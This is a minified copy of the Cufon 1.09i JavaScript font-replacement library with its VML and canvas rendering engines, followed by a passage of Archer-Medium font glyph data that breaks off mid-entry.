/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());;
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright (C) 2000, 2007 Hoefler & Frere-Jones. http://www.typography.com
 * 
 * Trademark:
 * Archer is a trademark of Hoefler & Frere-Jones, which may be registered in
 * certain jurisdictions.
 * 
 * Full name:
 * Archer-Medium
 * 
 * Manufacturer:
 * Hoefler & Frere-Jones
 * 
 * Designer:
 * Hoefler & Frere-Jones
 * 
 * Vendor URL:
 * www.typography.com
 * 
 * License information:
 * http://www.typography.com/support/eula.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"389,-277v1,-60,-20,-94,-76,-93v-52,0,-96,34,-135,75r0,235r66,0r0,60r-203,0r0,-60r68,0r0,-305r-68,0r0,-61r134,0r0,79v37,-46,93,-87,155,-87v68,0,106,30,119,84v46,-47,101,-84,157,-84v94,0,130,53,131,144r0,230r68,0r0,60r-203,0r0,-60r66,0r0,-217v1,-59,-20,-94,-75,-93v-51,0,-94,31,-135,73r0,237r66,0r0,60r-203,0r0,-60r68,0r0,-217","w":831,"k":{"?":22,"x":9,"v":23,"q":9,"p":9,"j":9,"b":9,"w":18,"y":13,"z":18,"a":9,"c":9,"d":9,"e":9,"g":9,"o":9,"s":9}},{"d":"145,-328v60,0,96,67,139,67v23,0,39,-22,46,-59r54,13v-5,69,-50,116,-97,116v-60,0,-97,-67,-138,-67v-24,0,-40,21,-47,59r-54,-13v6,-69,50,-116,97,-116","w":432},{"d":"258,-516v152,0,221,115,221,277v0,264,-134,363,-258,363v-70,-1,-150,-34,-154,-105v-4,-75,103,-75,102,-10v0,14,-5,24,-13,31v16,14,40,22,72,22v95,0,177,-93,183,-264v-27,47,-90,82,-161,82v-120,0,-206,-84,-206,-189v0,-116,89,-207,214,-207xm403,-320v-1,-76,-61,-135,-145,-135v-86,0,-142,62,-142,146v0,73,53,128,137,128v89,0,150,-64,150,-139","w":532,"k":{"}":10,"]":10,")":10,"7":10}},{"d":"229,124v-99,0,-187,-29,-187,-110v0,-31,22,-58,52,-58v45,0,64,57,31,82v21,17,54,25,100,25v87,0,146,-59,146,-139v0,-78,-54,-134,-144,-134v-51,0,-97,12,-134,29r-31,-18r37,-309r310,0r0,66r-256,0r-21,187v149,-49,311,24,311,179v0,117,-94,200,-214,200","w":485,"k":{"}":10,"]":10,")":10,"6":10,"-":10}},{"d":"246,8v-113,0,-202,-88,-202,-218v0,-121,83,-224,211,-224v53,0,99,20,132,51r0,-289r-80,0r0,-60r149,0r0,672r69,0r0,60r-136,0r0,-60v-36,40,-80,68,-143,68xm256,-52v55,0,97,-28,131,-64r0,-209v-32,-27,-72,-49,-128,-49v-84,0,-143,69,-143,163v-1,95,59,159,140,159","w":550,"k":{"z":9,"a":9,"s":9}},{"d":"101,200r0,-932r229,0r0,64r-158,0r0,804r158,0r0,64r-229,0","w":353,"k":{"9":10,"8":10,"6":20,"5":10,"4":20,"3":5,"2":10,"0":10,"p":-33,"j":-94,"b":-44,"Q":10,"J":31,"A":10,"S":5,"y":-33,"C":10,"G":10,"O":10,"a":11,"c":11,"d":11,"e":11,"g":11,"h":-44,"k":-44,"l":-44,"o":11,"s":22}},{"d":"35,-243r0,-70r235,0r0,70r-235,0","w":305,"k":{"M":10,"V":62,"X":52,"v":-11,"1":25,"A":15,"S":15,"T":62,"W":52,"Y":73,"Z":21,"t":-22,"w":-11,"y":-11,"h":-11,"k":-11,"l":-11}},{"d":"108,-182r-26,-475r90,0r-26,475r-38,0xm127,8v-32,0,-57,-26,-57,-58v0,-32,25,-59,57,-59v32,0,58,27,58,59v0,32,-26,58,-58,58","w":255},{"d":"239,-420r-33,-179v-9,-43,14,-71,47,-71v34,0,57,27,48,71r-34,179r-28,0xm69,-420r-33,-179v-9,-43,14,-71,47,-71v34,0,56,27,48,71r-34,179r-28,0","w":338},{"d":"39,209r-61,-27r410,-924r61,27","k":{"\/":129,"9":40,"5":40,"4":120,"3":60,"2":60,"1":30,"0":40,"x":56,"v":44,"q":88,"p":56,"m":56,"Q":31,"J":52,"A":42,"S":15,"Z":21,"u":56,"w":44,"y":44,"z":89,"C":31,"G":31,"O":31,"a":100,"c":88,"d":88,"e":88,"f":22,"g":88,"n":56,"o":88,"r":56,"s":100}},{"d":"53,-384v0,-85,90,-132,186,-132v121,0,184,71,184,146v0,84,-70,131,-151,181v-62,38,-116,76,-147,130r253,0r0,-86r62,0r0,145r-394,0r-9,-35v39,-94,118,-151,200,-203v65,-42,116,-76,116,-131v0,-50,-45,-86,-118,-86v-49,0,-90,18,-107,45v42,18,25,87,-23,87v-29,0,-52,-24,-52,-61","w":495,"k":{"}":10,"]":10,")":10,"9":10,"5":10,"3":10}},{"d":"156,122r-61,-29r255,-543r-255,0r0,100r-64,0r0,-158r393,0r14,30","w":470,"k":{"@":20,"}":20,"]":20,")":20,"\/":15,"&":10,"9":12,"8":10,"6":10,"5":10,"4":58,"3":15,"2":15,"0":22,".":50,",":50,":":20,";":20,"-":20}},{"d":"274,11v-129,0,-219,-72,-219,-136v0,-38,23,-63,53,-63v52,-1,66,62,36,93v22,22,71,41,131,41v88,0,141,-45,141,-116v0,-68,-62,-98,-137,-127v-113,-43,-199,-85,-199,-198v0,-101,80,-175,203,-175v108,0,196,62,196,130v0,37,-24,58,-52,58v-50,0,-67,-59,-39,-89v-18,-20,-66,-33,-107,-33v-79,0,-127,43,-127,103v0,70,62,99,145,131v108,42,191,83,191,194v0,116,-92,187,-216,187","w":549,"k":{"M":10,"V":15,"X":20,"*":10,"b":9,"\\":10,"p":9,"q":9,"v":13,"m":9,"x":18,"\/":5,"!":10,"A":15,"T":15,"U":5,"W":25,"Y":25,"Z":3,".":10,",":10,"u":9,"w":13,"y":13,"z":9,"a":18,"c":9,"d":9,"e":9,"g":9,"h":9,"k":9,"l":9,"n":9,"o":9,"r":9,"s":9}},{"d":"263,8v-133,0,-219,-99,-219,-221v0,-120,87,-221,219,-221v132,0,219,100,219,221v0,121,-87,221,-219,221xm263,-52v87,0,147,-66,147,-161v0,-94,-60,-161,-147,-161v-87,0,-147,67,-147,161v0,95,60,161,147,161","w":526,"k":{"\\":66,"}":11,"]":11,")":11,"?":22,"v":18,"x":9,"\/":23,".":22,",":22,"u":9,"w":4,"y":13,"z":9,"a":9}},{"d":"247,67v-27,59,-80,133,-145,133v-40,0,-74,-23,-74,-56v0,-28,19,-44,43,-44v24,0,39,18,45,37v49,-20,81,-107,109,-161r-160,-341r-59,0r0,-61r199,0r0,59r-67,0v0,0,121,274,120,274r122,-274r-70,0r0,-59r196,0r0,61r-58,0","w":513,"k":{"*":-11,"p":9,"q":18,"\/":15,"&":11,"@":22,".":56,",":56,"t":13,"z":18,"-":-11,"a":18,"c":18,"d":18,"e":18,"f":13,"g":18,"h":9,"k":9,"l":9,"o":18,"s":12}},{"d":"426,209r-410,-924r61,-27r410,924"},{"d":"84,-374v0,-77,128,-148,128,-215v0,-46,-41,-95,-160,-101r0,-55v152,4,228,68,228,156v0,56,-30,89,-77,136v-27,26,-48,49,-48,78v0,54,64,84,139,80r0,62v-75,-4,-140,26,-139,80v0,29,21,52,48,78v47,47,77,80,77,136v0,88,-76,152,-228,156r0,-55v119,-6,160,-55,160,-101v0,-66,-128,-139,-128,-215v0,-42,31,-92,117,-110v-86,-18,-117,-68,-117,-110","w":347},{"d":"104,200r0,-932r62,0r0,932r-62,0","w":270},{"w":227},{"d":"63,0r0,-60r120,0r0,-374r-107,27r-16,-60r162,-43r31,0r0,450r118,0r0,60r-308,0","w":409,"k":{"9":10,"7":7,"-":10}},{"d":"595,-267r-59,0v-18,54,-37,100,-62,138v40,38,97,88,106,95r-43,47r-103,-93v-55,59,-126,89,-207,89v-132,0,-198,-77,-198,-162v0,-80,51,-135,137,-184v-57,-65,-66,-100,-66,-144v0,-69,55,-149,158,-149v82,0,145,53,145,130v0,63,-38,111,-140,172r166,159v20,-30,36,-64,48,-98r-57,0r0,-59r175,0r0,59xm227,-53v67,0,120,-27,162,-69r-185,-175v-71,43,-102,84,-102,142v0,50,41,102,125,102xm171,-479v0,29,7,58,53,112v86,-53,108,-87,108,-133v0,-41,-31,-72,-74,-72v-52,0,-87,41,-87,93","w":619,"k":{"1":10,"j":-22,"V":42,"T":26,"W":42,"Y":42,"t":-22}},{"d":"285,8v-54,0,-103,-21,-140,-52r-21,45r-43,0r0,-673r-68,0r0,-60r137,0r0,362v36,-35,78,-64,146,-64v111,0,203,89,203,221v0,122,-88,221,-214,221xm281,-52v82,0,147,-64,147,-160v0,-97,-61,-162,-144,-162v-55,0,-99,28,-134,64r0,210v33,26,76,48,131,48","w":545,"k":{"\\":66,"}":11,"]":11,")":11,"?":22,"v":18,"x":9,"\/":23,".":22,",":22,"u":9,"w":13,"y":13,"z":9,"a":9}},{"d":"317,120r0,-178r-287,0r-13,-30r322,-431r52,39r-270,363r196,0r0,-142r67,-27r0,169r112,0r0,59r-112,0r0,178r-67,0","w":514,"k":{"9":10,"7":7,"5":10,"3":10,"-":25}},{"d":"220,-434v78,0,156,26,156,93v0,27,-18,46,-42,46v-35,1,-57,-34,-41,-68v-15,-10,-43,-15,-75,-15v-59,0,-93,31,-93,62v0,37,39,50,109,68v86,21,158,45,158,128v0,81,-79,128,-170,128v-86,0,-177,-24,-177,-102v0,-25,18,-47,43,-47v38,-1,57,38,39,70v14,11,49,24,95,24v58,0,104,-25,104,-66v0,-39,-40,-54,-101,-69v-103,-26,-167,-50,-167,-129v0,-64,60,-123,162,-123","w":437,"k":{"b":4,"\\":66,"}":11,"]":11,"p":9,")":11,"q":4,"?":22,"v":4,"j":4,"u":9,"w":4,"y":4,"z":9,"a":4,"c":4,"d":4,"e":4,"g":4,"h":13,"k":13,"l":13,"o":4}},{"d":"113,-258v-34,0,-61,-28,-61,-62v0,-34,27,-62,61,-62v34,0,61,28,61,62v0,34,-27,62,-61,62xm113,8v-34,0,-61,-28,-61,-62v0,-34,27,-62,61,-62v34,0,61,28,61,62v0,34,-27,62,-61,62","w":225},{"d":"242,14r-179,-379r-56,0r0,-61r1